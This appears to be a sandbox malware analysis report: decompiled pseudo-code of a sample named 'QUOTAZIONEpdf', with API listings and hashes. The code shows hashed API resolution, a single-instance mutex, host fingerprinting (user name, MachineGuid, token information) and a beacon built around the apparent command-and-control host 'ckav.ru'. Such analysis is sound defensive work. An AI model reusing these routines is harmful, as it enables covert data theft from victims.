				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                0x004040c4
                0x004040ce
                0x004040d0
                0x004040e8
                0x004040ea
                0x004040ec
                0x004040f2
                0x0040418d
                0x00404190
                0x00404184
                0x00000000
                0x00404184
                0x004041a0
                0x004041a5
                0x004041a7
                0x00000000
                0x00000000
                0x004041a9
                0x004041b6
                0x004041b8
                0x004041be
                0x004041cb
                0x004041d0
                0x004041d1
                0x004041d3
                0x004041d8
                0x004041dc
                0x00000000
                0x004041e2
                0x00404100
                0x0040410c
                0x00404111
                0x0040417a
                0x0040417a
                0x00000000
                0x0040411b
                0x0040411b
                0x00404120
                0x00404122
                0x00404122
                0x0040412c
                0x0040413a
                0x0040413c
                0x00404140
                0x00000000
                0x00404142
                0x0040414a
                0x00404155
                0x0040415a
                0x0040415e
                0x00404168
                0x00404174
                0x00404176
                0x00404176
                0x0040417d
                0x0040417e
                0x00000000
                0x00404183
                0x00404140

                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: File$AllocCreateReadVirtual
                • String ID: .tmp
                • API String ID: 3585551309-2986845003
                • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                0x0041386f
                0x0041387e
                0x00413885
                0x00413889
                0x0041388c
                0x00413890
                0x00413893
                0x00413897
                0x0041389a
                0x0041389e
                0x004138a1
                0x004138a5
                0x004138a8
                0x004138ac
                0x004138af
                0x004138b2
                0x004138b5
                0x004138b8
                0x004138bb
                0x004138bc
                0x004138c4
                0x004138c8
                0x004138cb
                0x004138cf
                0x004138d2
                0x004138d6
                0x004138d7
                0x004138df
                0x004138e3
                0x004138e4
                0x004138ea
                0x004138eb
                0x004138f1
                0x004138f5
                0x004138f9
                0x004138fd
                0x00413901
                0x00413905
                0x00413909
                0x0041390d
                0x00413911
                0x00413915
                0x00413919
                0x0041391d
                0x00413921
                0x00413925
                0x00413929
                0x0041392d
                0x00413931
                0x00413935
                0x00413939
                0x0041393d
                0x00413941
                0x00413950
                0x00413959
                0x0041395f
                0x00413968
                0x0041396e
                0x00413973
                0x00413977
                0x00413979
                0x00413980
                0x00413982
                0x00413991
                0x0041399c
                0x0041399e
                0x004139a4
                0x004139a9
                0x004139ac
                0x004139b1
                0x004139b1
                0x004139b2
                0x004139b7
                0x004139bc
                0x004139c1
                0x004139c7
                0x004139cd
                0x004139cd
                0x004139db

                APIs
                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                • GetLastError.KERNEL32 ref: 0041399E
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Error$CreateLastModeMutex
                • String ID:
                • API String ID: 3448925889-0
                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                0x004042cf
                0x004042d5
                0x004042df
                0x004042e2
                0x004042f9
                0x004042fb
                0x00404300
                0x0040430a
                0x00404314
                0x00404319
                0x00404323
                0x00404334
                0x0040433b
                0x0040433b
                0x0040433f
                0x00404344
                0x0040434c

                APIs
                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: File$CreatePointerWrite
                • String ID:
                • API String ID: 3672724799-0
                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                Download Yara Rule
                C-Code - Quality: 34%
                			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                0x00412d31
                0x00412d34
                0x00412d39
                0x00412d3c
                0x00412d49
                0x00412d50
                0x00412d52
                0x00412f24
                0x00412f24
                0x00412f2b
                0x00412f30
                0x00412f32
                0x00412f37
                0x00412f41
                0x00412f53
                0x00412f53
                0x00412f5b
                0x00412f60
                0x00412d58
                0x00412d58
                0x00412d63
                0x00412d6c
                0x00412d73
                0x00412d7e
                0x00412d7f
                0x00412d80
                0x00412d81
                0x00412d82
                0x00412d8f
                0x00412da1
                0x00412da6
                0x00412dae
                0x00412db0
                0x00412db1
                0x00412db5
                0x00412dce
                0x00412dcf
                0x00412dd5
                0x00412dda
                0x00412db7
                0x00412db7
                0x00412db8
                0x00412dbe
                0x00412dc4
                0x00412dc9
                0x00412dc9
                0x00412de2
                0x00412de4
                0x00412de5
                0x00412de7
                0x00412de9
                0x00412e02
                0x00412e03
                0x00412e09
                0x00412e0e
                0x00412deb
                0x00412deb
                0x00412dec
                0x00412df2
                0x00412df8
                0x00412dfd
                0x00412dfd
                0x00412e11
                0x00412e17
                0x00412e19
                0x00412e1a
                0x00412e1e
                0x00412e37
                0x00412e38
                0x00412e3e
                0x00412e43
                0x00412e20
                0x00412e20
                0x00412e21
                0x00412e27
                0x00412e2d
                0x00412e32
                0x00412e32
                0x00412e4b
                0x00412e4d
                0x00412e4f
                0x00412e7e
                0x00412e8a
                0x00412e8f
                0x00412e51
                0x00412e59
                0x00412e67
                0x00412e6d
                0x00412e72
                0x00412e72
                0x00412e9e
                0x00412eaf
                0x00412eb4
                0x00412ec0
                0x00412ece
                0x00412edc
                0x00412eea
                0x00412ef8
                0x00412f0f
                0x00412f14
                0x00412f14
                0x00412f17
                0x00412f1d
                0x00412f1f
                0x00000000
                0x00412f1f
                0x00412f74

                APIs
                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                  • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$CreateFreeProcessThread_wmemset
                • String ID: ckav.ru
                • API String ID: 2915393847-2696028687
                • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                0x00406340
                0x00406345
                0x00406373
                0x00406373
                0x00406347
                0x0040634f
                0x00406354
                0x00406357
                0x0040635c
                0x00406366
                0x0040636d
                0x00000000
                0x00406368
                0x00406368
                0x00406368
                0x00406366
                0x0040637a

                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • _wmemset.LIBCMT ref: 0040634F
                  • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateNameProcessUser_wmemset
                • String ID: CA
                • API String ID: 2078537776-1052703068
                • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                0x00406094
                0x004060a8
                0x004060ab

                APIs
                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: InformationToken
                • String ID: IDA
                • API String ID: 4114910276-365204570
                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                0x00402c10
                0x00402c15
                0x00402c1b
                0x00402c1e

                APIs
                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc
                • String ID: s1@
                • API String ID: 190572456-427247929
                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                0x00404a56
                0x00404a65
                0x00404a6a
                0x00404ad1
                0x00404ad1
                0x00404a6c
                0x00404a71
                0x00404a79
                0x00404a85
                0x00404a9a
                0x00404a9e
                0x00404acb
                0x00000000
                0x00404aa0
                0x00404aac
                0x00404abc
                0x00404ac1
                0x00404ac6
                0x00404ac6
                0x00404a9e
                0x00404ad9

                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateOpenProcessQueryValue
                • String ID:
                • API String ID: 1425999871-0
                • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                0x00402bb2
                0x00402bc0
                0x00000000
                0x00402bc0
                0x00402bc7

                APIs
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$FreeProcess
                • String ID:
                • API String ID: 3859560861-0
                • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                Download Yara Rule
                C-Code - Quality: 40%
                			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
